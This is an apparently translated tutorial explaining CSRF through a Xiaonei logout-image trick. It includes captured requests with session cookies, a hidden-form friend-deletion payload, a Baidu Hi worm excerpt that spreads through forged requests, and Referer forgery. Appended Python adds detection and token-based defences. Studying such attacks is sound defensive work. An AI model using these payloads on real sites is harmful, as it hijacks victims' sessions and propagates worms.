Web security practice (15) CSRF (Cross-Site Request Forgery): starting with inserting pictures on Xiaonei

Source: Internet
Author: User
Tags: csrf, attack


15.1 Starting with Xiaonei

(1) A simple result

Xiaonei (校内网) is said to be China's largest student social networking site, and its security has improved from the mess it was at the start. Client-side filtering went from allowing arbitrary code (HTML, CSS, script) in the early days to allowing only CSS now, and the server-side validation filters keywords... I actually learned a lot while using Xiaonei. If you occasionally write blog entries on Xiaonei, you inevitably pay attention to its editor.

These are all the functions the editor has; it does not let you view the source. Of course, that is not a problem, because we know the rendered entry must end up as HTML: simply find an online editor, compose the content there, and paste it in. Xiaonei has done a decent job here, though, and filters the pasted content as well; every script I tried was filtered out on the server. Without meaning to, I have written an advertisement for Xiaonei... Let's look at the entry I posted:

Title: heihei

"You are here,

You are here,

But when you want to leave ....

It's already late...

"

Anyone on Xiaonei who visited my entry found that, when they wanted to leave, they were taken to this page:


Huh? What happened, how did I get logged out... I have already been cursed at for this. Miserable! Quite a few people have probably been caught by it.

(2) A look inside

Next we analyze the HTTP requests behind this simple entry:

(1) The first request, for the entry content

GET /GetEntry.do?id=379593678&owner=201573034 HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Referer: http://blog.xiaonei.com/
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Accept-Encoding: gzip, deflate
Host: blog.xiaonei.com
Connection: Keep-Alive
Cookie: _ utma = Beijing; _ utmz = 204579609.1240405279.155.23.utmccn = (referral) | utmcsr = home.xiaonei.com | utmcct =/Home. do | utmcmd = referral; _ de = upper; id = 201800742; mop_uniq_ckid = 123.189.23.249 _ lower; _ r01 _ = 1; wpi_clew_cookie = exsit; lower = 0; homeNtcInf = 0; notifyTips201800742 = 1; xiaonei_stage = 20; bytes = 201573034; _ utmb = 204579609; depovince = LN; XNESSESSIONID = c9da0fa7aff8; _ utmc = 204579609; userid = 201573034; univid = 5426; gender = 1; univyear = 2005; societyguester = a2ac4d18338093affb56d55a2b96c90a4; kl = large; hostid = 201573034; jebecookies = 201573034 | 1 198| 5-1-5 | 20 | 0 | 5426 _; xn_app_histo_201573034 = 6-26302-3-20706-23446-20-9999-21461-8-17954-17940-2

This request returns the basic HTML of the page.

(2) Then, based on the elements found while parsing the HTML obtained in the first request, the browser sends the next request (for the image element):

GET /Logout.do HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Referer: http://blog.xiaonei.com/GetEntry.do?id=379593678&owner=201573034
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Accept-Encoding: gzip, deflate
Host: www.xiaonei.com
Connection: Keep-Alive
Cookie: _ utma = Beijing; _ utmz = 204579609.1240405279.155.23.utmccn = (referral) | utmcsr = home.xiaonei.com | utmcct =/Home. do | utmcmd = referral; _ de = upper; id = 201800742; mop_uniq_ckid = 123.189.23.249 _ lower; _ r01 _ = 1; wpi_clew_cookie = exsit; lower = 0; homeNtcInf = 0; notifyTips201800742 = 1; xiaonei_stage = 20; province = 201573034; depovince = LN; XNESSESSIONID = c9da0fa7aff8; _ utmc = 204579609; userid = 201573034; univid = 5426; gender = 1; univyear = 2005; societyguester = a2ac4d18338093affb56d55a2b96c90a4; kl = large; hostid = 201573034; jebecookies = 201573034 | 1 | 1985-1-5 | 20 | 0 | 5426 _; xn_app_histo_201573034 = 6-26302-3-20706-23446-20-9999-21461-8-17954-17940-2

(3) Brief Analysis:

What forces the user to log out is the picture: the image URL does not point to a real image but to the logout page, http://www.xiaonei.com/Logout.do. The browser sends this request by itself; that is the first point. Second, you can easily see that the browser attaches the local cookie to every request it sends, which is the basic condition for the logout to succeed: the server determines the user's identity and state from the cookie. This example demonstrates the simplest kind of request forgery.
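The two captured requests are also what a defender would look for in the server's access log: a state-changing endpoint reached with GET, referred from a page that renders user-authored content. The following Python is an added detection check, not code from the original article; the log lines are constructed in Apache combined format to mirror the requests above, and the endpoint lists (STATE_CHANGING, USER_CONTENT_PATHS) are assumptions.

```python
import re
from urllib.parse import urlsplit

# Constructed access-log lines modelled on the requests captured above (IPs,
# timestamps, status codes and sizes are made up for this example).
SAMPLE_LOG = """\
10.0.0.5 - - [22/Apr/2009:15:01:02 +0800] "GET /GetEntry.do?id=379593678&owner=201573034 HTTP/1.1" 200 18342 "http://blog.xiaonei.com/" "Mozilla/4.0 (compatible; MSIE 8.0)"
10.0.0.5 - - [22/Apr/2009:15:01:03 +0800] "GET /Logout.do HTTP/1.1" 302 0 "http://blog.xiaonei.com/GetEntry.do?id=379593678&owner=201573034" "Mozilla/4.0 (compatible; MSIE 8.0)"
10.0.0.7 - - [22/Apr/2009:15:02:10 +0800] "POST /Logout.do HTTP/1.1" 302 0 "http://www.xiaonei.com/Home.do" "Mozilla/4.0 (compatible; MSIE 8.0)"
10.0.0.9 - - [22/Apr/2009:15:03:44 +0800] "GET /DelFriend.do?id=200945709&from=vu HTTP/1.1" 200 512 "http://blog.xiaonei.com/GetEntry.do?id=1&owner=2" "Mozilla/4.0 (compatible; MSIE 8.0)"
"""

# Assumed list of endpoints that change server-side state; the page names these two.
STATE_CHANGING = {"/Logout.do", "/DelFriend.do"}

# Assumed list of paths that render user-authored content (where an <img> tag can hide).
USER_CONTENT_PATHS = {"/GetEntry.do"}

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)


def parse_line(line):
    """Parse one combined-format line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry["path"] = urlsplit(entry["target"]).path
    return entry


def suspicious(entry):
    """Return the reasons this request looks like a forged GET (empty list if clean)."""
    reasons = []
    if entry["method"] == "GET" and entry["path"] in STATE_CHANGING:
        reasons.append("state-changing endpoint hit via GET")
        ref_path = urlsplit(entry["referer"]).path
        if ref_path in USER_CONTENT_PATHS:
            reasons.append(f"referer is a user-content page: {ref_path}")
    return reasons


def scan(log_text):
    """Run the check over a log and return (ip, method, path, reasons) per flagged request."""
    findings = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        reasons = suspicious(entry)
        if reasons:
            findings.append((entry["ip"], entry["method"], entry["path"], reasons))
    return findings


if __name__ == "__main__":
    for ip, method, path, reasons in scan(SAMPLE_LOG):
        print(ip, method, path, "; ".join(reasons))
```

The POST to /Logout.do is deliberately not flagged: the check targets the browser-initiated GET that an image or link produces, which is the only kind of request the picture trick can generate.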

15.2 Cross-Site Request Forgery Principle

(1) What is cross-site Request Forgery?

CSRF is an attack that forges client requests. CSRF stands for Cross-Site Request Forgery. It forces the victim's browser to send requests to a vulnerable web application and thereby carries out the operation the attacker wants.

(2) Types of Cross-Site Request Forgery


1. Intra-site forgery. Intra-site forgery does not involve cross-origin requests, so it is relatively simple to carry out; the picture inserted on Xiaonei above is an example. Notice the header "Referer: http://blog.xiaonei.com/GetEntry.do?id=379593678&owner=201573034". If "blog.xiaonei.com" were instead "hi.baidu.com", this request would fail because of cross-domain access. If we submit a request to http://xiaonei.com/DelFriend.do?id=200945709&from=vu, the user with id 200945709 is deleted from the current user's friend list. I will not give worse examples. In short, as long as the current user is logged in, in theory he will do whatever you want him to do. An e-commerce site could suffer far worse if this happens.

2. Off-site forgery. This submits the request cross-origin. Off-site forgery also makes up for the various limitations of intra-site forgery: for example, if you cannot submit a particular script or HTML on the target site, you can construct your own page on another site. Off-site forgery is more flexible, so we have more options.

(3) GET and POST

A GET request is like the image or hyperlink we saw above. Many sites accept only POST requests for such operations, because in many cases a POST cannot be sent on its own. However, we also see cases where POST data is expected but a GET succeeds anyway because of programmer negligence. Request.Form, Request.QueryString and Request are the three ways ASP.NET reads submitted data; if you use Request alone, you cannot distinguish GET from POST, which gives a malicious attacker an opening. Cross-site forgery of POST requests is almost always done off-site, because there I can easily construct a form and submit it.

(4) Relationship between browser security features and forged requests

Client-side cookies are the most common mechanism for recognizing user state, managing permissions, authentication and session persistence; however, our browser attaches cookies to requests such as the image request above, which provides the basic guarantee a forged request needs.

The following passage is quoted from a source on the web:

"According to the standard Set-Cookie format, the cookies currently supported by browsers actually come in two forms:
Set-Cookie: <name>=<value>[; <name>=<value>][; expires=<date>][; domain=<domain_name>][; path=<some_path>][; secure][; HttpOnly]
One is the memory cookie: if the expires parameter of the cookie is not set, the cookie becomes invalid once the browser is closed and is not stored locally. The other is the cookie saved locally, that is, one with the expires parameter set. If the cookie specifies an expiration time, the cookie is saved locally, and when the website is visited again after the browser has been closed, all requests during the cookie's validity period carry the local cookie.
Internet Explorer has a Privacy Report function, which is in fact a security function that blocks all third-party cookies. For example, if a web page in domain A embeds a file from domain B, then after the client browser visits domain A's page, the cookie contained in the file request sent to domain B is intercepted by IE. Besides file requests, if an IFRAME is used to include a web page from domain B, then after visiting domain A's page, all requests in domain B's page, including the cookie in the file request, are also intercepted by IE. However, this security feature of Internet Explorer has two characteristics: first, it does not intercept memory cookies; second, when a website sets the P3P header it allows cross-origin cookie access, and the Privacy Report function no longer works.
Therefore, given this security feature of Internet Explorer, an attacker who conducts an off-site CSRF attack and uses file requests to forge GET requests can succeed against the victim only when a memory cookie is used, that is, when the login session state is not saved. Firefox has not considered such a function, so there is no such limit on off-site CSRF attacks there."
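The distinction the quoted text draws (memory cookie versus locally saved cookie) is decided entirely by the Set-Cookie attributes, and today the same header also decides whether the browser attaches the cookie to a request another site initiated. The following Python is an added illustration, not part of the original article or of the quoted source: it parses Set-Cookie headers in the format quoted above, classifies each cookie, and models cross-site attachment using the SameSite attribute, which did not exist when the article was written. The cookie names and values are constructed; treating a missing SameSite as Lax follows Chromium's current default, and other browsers differ.

```python
from email.utils import parsedate_to_datetime

# Constructed Set-Cookie headers in the format quoted above; names and values are made up.
SAMPLE_HEADERS = [
    "Set-Cookie: SESSIONID=abc123; Path=/; HttpOnly",
    "Set-Cookie: userid=1001; expires=Wed, 22 Apr 2015 00:00:00 GMT; domain=.example.net; path=/",
    "Set-Cookie: pref=large; Max-Age=3600; Secure; SameSite=None",
    "Set-Cookie: csrf=deadbeef; Path=/; SameSite=Strict",
]


def parse_set_cookie(header):
    """Parse one Set-Cookie header (with or without the 'Set-Cookie:' prefix) into a dict."""
    if header.lower().startswith("set-cookie:"):
        header = header.split(":", 1)[1]
    parts = [p.strip() for p in header.split(";") if p.strip()]
    name, _, value = parts[0].partition("=")
    cookie = {"name": name.strip(), "value": value.strip(), "expires": None,
              "max_age": None, "domain": None, "path": "/", "secure": False,
              "httponly": False, "samesite": None}
    for attr in parts[1:]:
        key, _, val = attr.partition("=")
        key, val = key.strip().lower(), val.strip()
        if key == "expires":
            cookie["expires"] = parsedate_to_datetime(val)   # RFC 1123 date
        elif key == "max-age":
            cookie["max_age"] = int(val)
        elif key == "domain":
            cookie["domain"] = val.lstrip(".").lower()
        elif key == "path":
            cookie["path"] = val or "/"
        elif key == "secure":
            cookie["secure"] = True
        elif key == "httponly":
            cookie["httponly"] = True
        elif key == "samesite":
            cookie["samesite"] = val.lower()
    return cookie


def is_persistent(cookie):
    """The quoted text's split: expires (or Max-Age) means the cookie is stored on disk and
    survives closing the browser; otherwise it lives only in memory for the session."""
    return cookie["expires"] is not None or cookie["max_age"] is not None


def sent_cross_site(cookie, request_kind, default_samesite=None):
    """Would the browser attach this cookie to a request initiated by another site?
    request_kind: 'img' (image/script load), 'form_post', or 'top_level_get' (link click).
    default_samesite=None models a browser without SameSite, where every request carries
    the cookie (the situation this article describes); 'lax' models Chromium's default."""
    mode = cookie["samesite"] or default_samesite
    if mode is None or mode == "none":
        return True
    if mode == "strict":
        return False
    # Lax: only top-level navigations with a safe method carry the cookie.
    return request_kind == "top_level_get"


def classify(headers, request_kind="img", default_samesite=None):
    """Map cookie name -> (storage class, attached on a cross-site request of this kind)."""
    report = {}
    for h in headers:
        c = parse_set_cookie(h)
        report[c["name"]] = ("persistent" if is_persistent(c) else "memory",
                             sent_cross_site(c, request_kind, default_samesite))
    return report


if __name__ == "__main__":
    print("no SameSite support, <img> request:", classify(SAMPLE_HEADERS))
    print("Lax default, <img> request:       ", classify(SAMPLE_HEADERS, default_samesite="lax"))
```

With no SameSite support, every cookie rides along on the image request, which is exactly why the logout picture worked; with a Lax default, a session cookie without an explicit SameSite attribute is withheld from image loads and cross-site form posts but still sent on an ordinary link click.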

15.3 Common cross-site request forgery methods

I don't want to give detailed examples here; there is plenty of relevant material on the web that you can look up as needed.

(1) Direct request

It is essentially a GET request. This method is direct: the user clicks a hyperlink, or the browser automatically requests the resource (for example through image and <script> tags). If such a link is embedded in an e-mail, could it delete the user's e-mail? I have never tried.

(2) POST

POST data needs JavaScript support, so it is hard to do intra-site (except through an XSS vulnerability); it is generally used for off-site forgery.

<iframe name="XX" display="none">
  <form method="POST" name="xxx" action="http://*****.com/deleteFriend.aspx">
    <input type="hidden" name="ID" value="2702455999">
  </form>
</iframe>
<script type="text/javascript">
function DealFriend() {
  iframe = document.frames["XX"];
  iframe.document.Submit("xxx");
}
</script>

(3) Ajax call

JSON data is widely used. An attacker can send requests to a data interface that returns JSON and obtain key data from it. The Baidu Hi worm used JSON data to obtain the friend list and then spread its script. Part of its code follows:

Dynamically obtaining the friend list as JSON:

var gotfriends = function (x) {
    for (i = 0; i < x[2].length; i++) {
        friends.push(x[2][i][1]);
    }
};
loadjson('<script src="http://frd.baidu.com/?ct=28&un=' + lusername + '&cm=FriList&tn=bmABCFriList&callback=gotfriends&.tmp=&1=2"><\/script>');

Core part of the infection payload output and message sending:

evilurl = url + "/wish.php?from=" + lusername + "&to=";
sendmsg = "http://msg.baidu.com/?ct=22&cm=MailSend&tn=bmSubmit&sn=[user]&co=[evilmsg]";
for (i = 0; i < friends.length; i++) {
    // omitted ................
    mysendmsg = mysendmsg + "&" + i;
    eval('x' + i + ' = new Image(); x' + i + '.src = unescape("' + mysendmsg + '");');
    // omitted ................
}

Another Ajax-style method is to request a script file, or a page that dynamically generates a script, and insert it into the current page to perform some operations. This is also one of the approaches to intra-site forgery when arbitrary code can be added.

(4) Forging an HTTP header

This is one of the ways around cross-origin verification, usually by forging the Referer.

In .NET it can be set with code like this:

HttpWebRequest myHttpWebRequest = (HttpWebRequest)WebRequest.Create(myUri);
myHttpWebRequest.Referer = "http://www.microsoft.com";

or through the Headers property of HttpWebRequest.

To set the HTTP header this way, the attacker has to get the victim's information submitted to their own page, and then have the custom request they send to the target page carry the victim's authentication information.

(5) AJAX cross-origin solutions

What is mentioned here is supplementary knowledge and does not involve direct attacks; see the related articles for details, since a full discussion would have enough content for a topic of its own.

1. iframe nesting

2. Application proxy

3. script tag

15.4 Cross-Site Request Forgery Solutions

.........

I want to leave this part to the readers. What do you think?
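Since the article leaves the solution to the reader, here is one worked answer as an added example (not code from the original article or from Xiaonei). It protects a DelFriend-style handler against the three cases discussed above: the GET fired by a picture (15.1 and 15.3 (1)), the hidden form posted from another site (15.3 (2)), and a forged Referer from a non-browser client (15.3 (4)). The defences are stacked: state-changing actions are POST only; Origin, or Referer as a fallback, must belong to an allow-listed host; a synchronizer token bound to the session is read from the POST body only, which also avoids the ASP.NET Request pitfall from 15.2 (3); and the session cookie is issued with SameSite=Lax and HttpOnly. ALLOWED_ORIGINS, the session id, the SESSIONID and csrf_token names and the sample requests are all assumptions constructed for the demo.

```python
import hashlib
import hmac
import secrets
from urllib.parse import parse_qs, urlsplit

# Assumed deployment details for this example.
ALLOWED_ORIGINS = {"www.xiaonei.com"}        # hosts allowed to submit state-changing forms
SECRET_KEY = secrets.token_bytes(32)         # server-side key, generated per process here
VICTIM_SESSION = "sess-victim-0001"          # constructed session id for the demo


def session_set_cookie(session_id):
    """Header for issuing the session cookie. SameSite=Lax stops the browser attaching it to
    <img> loads and cross-site form POSTs; HttpOnly keeps it away from injected script."""
    return f"Set-Cookie: SESSIONID={session_id}; Path=/; Secure; HttpOnly; SameSite=Lax"


def make_csrf_token(session_id):
    """Synchronizer token bound to the session: HMAC(key, session id). A page on another
    site cannot read it, because the same-origin policy hides our pages' content from it."""
    return hmac.new(SECRET_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def check_csrf(request):
    """Return (ok, reason). `request` is a dict with method, headers, cookies, body, query."""
    # 1. State-changing actions are POST only: an <img> or link can only produce a GET.
    if request["method"] != "POST":
        return False, "state-changing action requires POST"
    session_id = request["cookies"].get("SESSIONID")
    if not session_id:
        return False, "no session"
    # 2. Origin (Referer as fallback) must be one of our own hosts. A browser does not let a
    #    page set these headers, and a client that can forge them has no victim cookie.
    source = request["headers"].get("Origin") or request["headers"].get("Referer")
    if not source or urlsplit(source).hostname not in ALLOWED_ORIGINS:
        return False, "cross-site origin"
    # 3. The token is read from the POST body only, never from the query string, so a
    #    merged accessor cannot let ?csrf_token=... on a GET count.
    body = parse_qs(request["body"])
    token = body.get("csrf_token", [""])[0]
    if not hmac.compare_digest(token.encode(), make_csrf_token(session_id).encode()):
        return False, "bad csrf token"
    return True, "ok"


def delete_friend(request, friends):
    """A DelFriend-style handler with the checks applied; returns a small result dict."""
    ok, reason = check_csrf(request)
    if not ok:
        return {"status": 403, "reason": reason}
    target = parse_qs(request["body"]).get("id", [None])[0]   # body only, not query string
    if target is None:
        return {"status": 400, "reason": "missing id"}
    friends.discard(target)
    return {"status": 200, "reason": "deleted"}


def _request(method, headers, body="", query="", session=VICTIM_SESSION):
    return {"method": method, "headers": headers, "cookies": {"SESSIONID": session},
            "body": body, "query": query}


# Constructed requests modelling the cases discussed on this page.
def forged_image_get():
    """An <img src=".../DelFriend.do?id=200945709&from=vu"> on a user-content page."""
    return _request("GET", {"Referer": "http://blog.xiaonei.com/GetEntry.do?id=1&owner=2"},
                    query="id=200945709&from=vu")


def forged_offsite_post():
    """A hidden form auto-submitted from the attacker's own site; it has no token."""
    return _request("POST", {"Origin": "http://attacker.example"}, body="id=200945709")


def token_in_query_post():
    """Same-origin POST that carries the token only in the URL, as a merged accessor would accept."""
    return _request("POST", {"Origin": "http://www.xiaonei.com"}, body="id=200945709",
                    query=f"csrf_token={make_csrf_token(VICTIM_SESSION)}")


def legitimate_post():
    """The real form: same origin, token embedded in the body."""
    return _request("POST", {"Origin": "http://www.xiaonei.com"},
                    body=f"id=200945709&csrf_token={make_csrf_token(VICTIM_SESSION)}")


if __name__ == "__main__":
    friends = {"200945709", "100000001"}
    for case in (forged_image_get, forged_offsite_post, token_in_query_post, legitimate_post):
        print(case.__name__, delete_friend(case(), friends), sorted(friends))
```

The token check is the one that actually decides; the method and origin checks are cheap early rejections that also give clear log lines, and the SameSite cookie attribute removes the browser-side precondition the article identifies (the cookie riding along on every request) in browsers that support it.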
